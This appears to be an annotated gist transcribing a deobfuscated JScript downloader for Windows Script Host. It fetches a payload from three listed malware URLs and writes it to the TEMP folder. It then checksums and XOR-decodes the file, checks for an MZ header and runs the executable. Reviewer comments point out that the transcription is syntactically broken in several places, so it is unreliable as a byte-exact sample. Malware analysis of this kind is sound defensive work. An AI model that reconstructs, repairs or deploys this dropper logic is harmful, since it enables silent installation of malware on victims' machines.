
@levisre
Last active July 14, 2016 09:02
// Analyst's deobfuscated transcription of a JScript (Windows Script Host) downloader.
// This first run of statements only sets up constants: key material, download URLs,
// the drop path and the HTTP component names.
// NOTE(review): several lines here and below are not valid JScript as transcribed
// (unquoted ProgID / %TEMP%, undefined names), so read this as analysis notes rather
// than as the byte-exact sample.
//
// Key material: each assignment uses the comma operator, so only the right-hand "VVV…"
// string is kept. Only the *lengths* of these strings are used later (in doDecrypt).
var keyBuffer = ("112" + "313" + "2","VVVVVVVVVVVVVVVVVVVVVV"); // VVVVV + VVVV + VV + VVVVV + VV + VVVV);
// Seeds the additive checksum in doDecrypt.
var keybufferLen = keyBuffer.length;
var keybuffer2 = "VVVVVVVVVVVVVVVVVVVVV"; //VVVVV + VV + VV + VV + VVVVV + VV + VV + V;
// Initial value of the rolling XOR key in doDecrypt.
var keybuffer2Len = keybuffer2.length; // keybuffer2[leng + th];
var keybuffer3 = ("asfasdfasfd", "VVVVV"); // (asfas + dfasf + d, VVVVV);
// Per-byte increment of the rolling XOR key in doDecrypt.
var keybuffer3Len = keybuffer3.length; //keybuffer3[leng + th];
// Not referenced anywhere else in the visible source.
var LUj = 1;
// ADODB.Stream type value used by decrypt() to read the file in text mode.
var adTypeText = 2;
// Download locations tried by the main loop; together with the fixed file name below
// these are the network/host indicators visible on this page.
var malURL = ["http://sirimba.com.br/qiovtl","http://zakagimebel.ru/krcsvf","http://repair-service.london/uywgi7v"];
// NOTE(review): ProgID is unquoted in this transcription; presumably "WScript.Shell".
var wsShell = WScript.CreateObject(WScript.Shell);
// NOTE(review): %TEMP% is unquoted in this transcription; presumably the string "%TEMP%".
var envStr = wsShell.ExpandEnvironmentStrings(%TEMP%);
// The name fragments are appended directly to the expanded path; no path separator is
// shown here, whereas dropedName below shows one — confirm against the sample.
var fileName = envStr + "0ttyR" + "4ET9B" + "xiI";
// Path the decoded payload is written to and later executed from.
var fullFileName =fileName + ".exe";
// NOTE(review): the main loop refers to `dropedFile`, which is not defined in the visible
// source; this variable may be what was meant.
var dropedName = "%TEMP%/0ttyR4ET9BxiI.exe";
// COM HTTP clients the script tries to instantiate.
var listProtocol = ["WinHttp.WinHttpRequest.5.1", "MSXML2.XMLHTTP"];
// Try to instantiate each HTTP COM component in listProtocol.
// A ProgID that cannot be created throws and is skipped. There is no `break` on success,
// so as transcribed objHttpReq ends up holding the last component that could be created.
// If none can be created, objHttpReq stays undefined and every use in the main loop throws.
for(var i=0;i<listProtocol.length;i++)
{
try {
var objHttpReq = WScript.CreateObject(listProtocol[i]);
}
catch(exception)
{
continue;
}
};
// Main download / decode / execute loop.
// Sequence shown: HTTP GET from malURL -> write the raw response to disk through
// ADODB.Stream -> read it back and decode it (decrypt + doDecrypt) -> sanity-check size
// and MZ header -> write the decoded bytes to fullFileName -> run it -> stop.
// Any exception sleeps one second and retries, so the loop only ends after a successful run.
// NOTE(review): the braces in this transcription do not balance (the `if (1 == _true)`,
// the size-check `if` and the `try` are never closed as shown), and objADODBStream,
// dropedFile and saveFile are not defined in the visible source.
var _true = 1;
var urlIndex = 0;
do {
try {
if (1 == _true) {
// NOTE(review): as transcribed the request is only issued inside this wrap-around
// branch; presumably the index reset alone belongs in the `if` — confirm against the sample.
if(urlIndex>=malURL.length)
{
urlIndex=0;
WScript.Sleep(1000);
// Synchronous GET (third argument false) to the next URL in the list.
objHttpReq.open("GET",malURL[urlIndex++ % malURL.length],false);
objHttpReq.send();
}
// Wait until the request reports completion (readystate 4).
if (objHttpReq.readystate<4)
{
WScript.Sleep(100);
continue;
}
// Write the response body to disk unchanged: stream type 1 is binary mode in ADODB.Stream.
objADODBStream.open();
objADODBStream.type = 1;
// NOTE(review): stray `]` in the transcription.
objADODBStream.write(objHttpReq.ResponseBody]);
objADODBStream.position = 0;
//objADODBStream["Sa" + "veT" + "oF" + "ile"](dropedFile, 2);
// Save option 2 overwrites an existing file.
objADODBStream.SaveToFile(dropedFile,2);
//objADODBStream[clos + e]();
objADODBStream.close();
// Read the saved file back as an array of byte values, then verify and decode it.
var decryptObj = decrypt(dropedFile);
decryptObj = doDecrypt(decryptObj);
// Reject the result unless it is between 100 KiB and 230 KiB and starts with "MZ".
// doDecrypt returns [] on a checksum mismatch, which also fails this check.
// NOTE(review): `decryptObjdFile` looks like a typo for `decryptObj`.
if (decryptObjdFile.length < 100 * 1024 || (decryptObj.length > 230 * 1024 || !isMZ(decryptObj))) {
_true = 1;
continue;
// Write the decoded executable and launch it. The command line is the path followed
// by " 3 21". Process telemetry showing a script host starting an .exe from the
// TEMP directory corresponds to this line.
saveFile(fullFileName, decryptObj);
wsShell.Run(fullFileName + " 3" +" 21");
break;
} catch (exception) {
// Best-effort retry: every failure is swallowed and the loop starts over.
WScript.Sleep(1000);
continue;
};
} while (_true);
// NOTE(review): `WSCript` differs in case from `WScript` used elsewhere; JScript
// identifiers are case-sensitive, so this is presumably a transcription slip.
WSCript.Quit(0);
// Verifies and decodes the downloaded data.
// `o` is the array of byte values produced by decrypt()/getBuffer(). The code treats the
// last four bytes as a little-endian 32-bit checksum over the preceding bytes.
// Returns [] when the checksum does not match; otherwise the array reversed and XOR-decoded
// with a rolling one-byte key.
// NOTE(review): this transcription is not valid JScript as shown — see the notes on the
// split() call and on the second loop's missing opening brace.
function doDecrypt(o) {
var expected;
// Stored checksum: last four bytes, least-significant byte first.
// NOTE(review): `<< 24` yields a signed 32-bit value in JavaScript, while `expected` below
// is kept non-negative by `% 0x100000000`; as written the two could differ when the top
// bit is set — confirm how the sample handles this.
var actual = o[o.length-4] | o[o.length-3] << 8 | o[o.length-2] << 16 | o[o.length-1] <<24;
// NOTE(review): arrays have no split(); presumably splice() was meant, removing the four
// checksum bytes. It also reads the global decryptObj rather than the parameter o.
o.split(decryptObj.length-4, 4);
// Additive checksum: starts at the length of keyBuffer and adds every byte, modulo 2^32.
expected = keybufferLen;
var m = 0;
for(;m< o.length;m++)
{
expected = (expected + o[m]) % 0x100000000;
}
if (expected != actual)
{
return []
};
// Rolling XOR key: starts at keybuffer2.length and grows by keybuffer3.length (mod 256)
// for every byte. Assigned without `var`, so it is an implicit global.
getKey2Len = keybuffer2Len;
// Bytes are stored in reverse order; restore the order before XOR-decoding.
o = o.reverse();
m = 0;
// NOTE(review): the opening brace of this loop is missing in the transcription; the two
// statements below are presumably both inside the loop body.
for (;m < o.length;m++)
o[m] ^= getKey2Len;
getKey2Len = (getKey2Len + keybuffer3Len) % 256;
}
return o;
};
// Returns true when the first two elements of `input` equal 77 and 90 (0x4D 0x5A, "MZ"),
// the signature that starts DOS/PE executables; false otherwise.
// Only these two bytes are examined, so this is a sanity check on the decoded data and
// not a validation of the PE structure.
function isMZ(input) {
  var signature = [77, 90]; // 'M', 'Z'
  for (var k = 0; k < signature.length; k++) {
    // Loose comparison kept on purpose, as in the original check.
    if (input[k] != signature[k]) {
      return false;
    }
  }
  return true;
};
// Reads the file at path `badge` and returns its contents as an array of byte values.
// Despite the name, no decryption happens here: the file is loaded through ADODB.Stream in
// text mode with the CP437 charset, and getBuffer() then maps each resulting character
// back to the byte it came from. The checksum and XOR decoding are done in doDecrypt().
function decrypt(badge) {
var owner = WScript.CreateObject("ADODB.Stream");
// adTypeText is 2 (set at the top of the script): text mode, so ReadText() can be used.
owner.type = adTypeText;
// CP437 gives every byte value its own character, which getBuffer() relies on to map
// the text back to bytes.
owner.Charset = "437"; //CP437
owner.open();
owner.LoadFromFile(badge);
var unlock = owner.ReadText();
owner.close();
return getBuffer(unlock);
};
// Converts a string that was decoded as CP437 text back into an array of byte values.
// Characters below 128 map to their own code; characters in the CP437 upper half are
// looked up by Unicode code point and map to bytes 0x80..0xFF. A character that is
// neither (not part of CP437) produces `undefined` in the output array.
// Called by decrypt() on the text read through ADODB.Stream.
function getBuffer(input) {
  // Unicode code points of CP437 bytes 0x80..0xFF, listed in byte order
  // (eight per row; the row comment gives the first byte of the row).
  var cp437UpperHalf = [
    0xC7, 0xFC, 0xE9, 0xE2, 0xE4, 0xE0, 0xE5, 0xE7, // 0x80
    0xEA, 0xEB, 0xE8, 0xEF, 0xEE, 0xEC, 0xC4, 0xC5, // 0x88
    0xC9, 0xE6, 0xC6, 0xF4, 0xF6, 0xF2, 0xFB, 0xF9, // 0x90
    0xFF, 0xD6, 0xDC, 0xA2, 0xA3, 0xA5, 0x20A7, 0x192, // 0x98
    0xE1, 0xED, 0xF3, 0xFA, 0xF1, 0xD1, 0xAA, 0xBA, // 0xA0
    0xBF, 0x2310, 0xAC, 0xBD, 0xBC, 0xA1, 0xAB, 0xBB, // 0xA8
    0x2591, 0x2592, 0x2593, 0x2502, 0x2524, 0x2561, 0x2562, 0x2556, // 0xB0
    0x2555, 0x2563, 0x2551, 0x2557, 0x255D, 0x255C, 0x255B, 0x2510, // 0xB8
    0x2514, 0x2534, 0x252C, 0x251C, 0x2500, 0x253C, 0x255E, 0x255F, // 0xC0
    0x255A, 0x2554, 0x2569, 0x2566, 0x2560, 0x2550, 0x256C, 0x2567, // 0xC8
    0x2568, 0x2564, 0x2565, 0x2559, 0x2558, 0x2552, 0x2553, 0x256B, // 0xD0
    0x256A, 0x2518, 0x250C, 0x2588, 0x2584, 0x258C, 0x2590, 0x2580, // 0xD8
    0x3B1, 0xDF, 0x393, 0x3C0, 0x3A3, 0x3C3, 0xB5, 0x3C4, // 0xE0
    0x3A6, 0x398, 0x3A9, 0x3B4, 0x221E, 0x3C6, 0x3B5, 0x2229, // 0xE8
    0x2261, 0xB1, 0x2265, 0x2264, 0x2320, 0x2321, 0xF7, 0x2248, // 0xF0
    0xB0, 0x2219, 0xB7, 0x221A, 0x207F, 0xB2, 0x25A0, 0xA0 // 0xF8
  ];

  // Sparse lookup: Unicode code point -> original byte value.
  var byteForCodePoint = new Array();
  for (var slot = 0; slot < cp437UpperHalf.length; slot++) {
    byteForCodePoint[cp437UpperHalf[slot]] = 0x80 + slot;
  }

  var bytes = new Array();
  for (var pos = 0; pos < input.length; pos++) {
    var code = input.charCodeAt(pos);
    // ASCII passes through; anything else goes through the table (undefined if absent).
    bytes.push(code < 128 ? code : byteForCodePoint[code]);
  }
  return bytes;
}
// Inverse of getBuffer(): turns an array of byte values into a string by mapping each
// byte to the Unicode character CP437 assigns to it. Values below 128 map to themselves;
// 0x80..0xFF go through the table; any other value has no table entry and becomes U+0000.
// Not called anywhere in the visible script — presumably used by the saveFile helper,
// which is not shown; confirm against the sample.
function manipulateData(data) {
  // Unicode code points of CP437 bytes 0x80..0xFF, listed in byte order
  // (eight per row; the row comment gives the first byte of the row).
  var cp437UpperHalf = [
    0x00C7, 0x00FC, 0x00E9, 0x00E2, 0x00E4, 0x00E0, 0x00E5, 0x00E7, // 0x80
    0x00EA, 0x00EB, 0x00E8, 0x00EF, 0x00EE, 0x00EC, 0x00C4, 0x00C5, // 0x88
    0x00C9, 0x00E6, 0x00C6, 0x00F4, 0x00F6, 0x00F2, 0x00FB, 0x00F9, // 0x90
    0x00FF, 0x00D6, 0x00DC, 0x00A2, 0x00A3, 0x00A5, 0x20A7, 0x0192, // 0x98
    0x00E1, 0x00ED, 0x00F3, 0x00FA, 0x00F1, 0x00D1, 0x00AA, 0x00BA, // 0xA0
    0x00BF, 0x2310, 0x00AC, 0x00BD, 0x00BC, 0x00A1, 0x00AB, 0x00BB, // 0xA8
    0x2591, 0x2592, 0x2593, 0x2502, 0x2524, 0x2561, 0x2562, 0x2556, // 0xB0
    0x2555, 0x2563, 0x2551, 0x2557, 0x255D, 0x255C, 0x255B, 0x2510, // 0xB8
    0x2514, 0x2534, 0x252C, 0x251C, 0x2500, 0x253C, 0x255E, 0x255F, // 0xC0
    0x255A, 0x2554, 0x2569, 0x2566, 0x2560, 0x2550, 0x256C, 0x2567, // 0xC8
    0x2568, 0x2564, 0x2565, 0x2559, 0x2558, 0x2552, 0x2553, 0x256B, // 0xD0
    0x256A, 0x2518, 0x250C, 0x2588, 0x2584, 0x258C, 0x2590, 0x2580, // 0xD8
    0x03B1, 0x00DF, 0x0393, 0x03C0, 0x03A3, 0x03C3, 0x00B5, 0x03C4, // 0xE0
    0x03A6, 0x0398, 0x03A9, 0x03B4, 0x221E, 0x03C6, 0x03B5, 0x2229, // 0xE8
    0x2261, 0x00B1, 0x2265, 0x2264, 0x2320, 0x2321, 0x00F7, 0x2248, // 0xF0
    0x00B0, 0x2219, 0x00B7, 0x221A, 0x207F, 0x00B2, 0x25A0, 0x00A0 // 0xF8
  ];

  // Lookup indexed by byte value, filled for 0x80..0xFF only.
  var codePointForByte = new Array();
  for (var slot = 0; slot < cp437UpperHalf.length; slot++) {
    codePointForByte[0x80 + slot] = cp437UpperHalf[slot];
  }

  var text = "";
  for (var pos = 0; pos < data.length; pos++) {
    var value = data[pos];
    var codePoint;
    if (value < 128) {
      codePoint = value;
    } else {
      codePoint = codePointForByte[value];
    }
    text += String.fromCharCode(codePoint);
  }
  return text;
};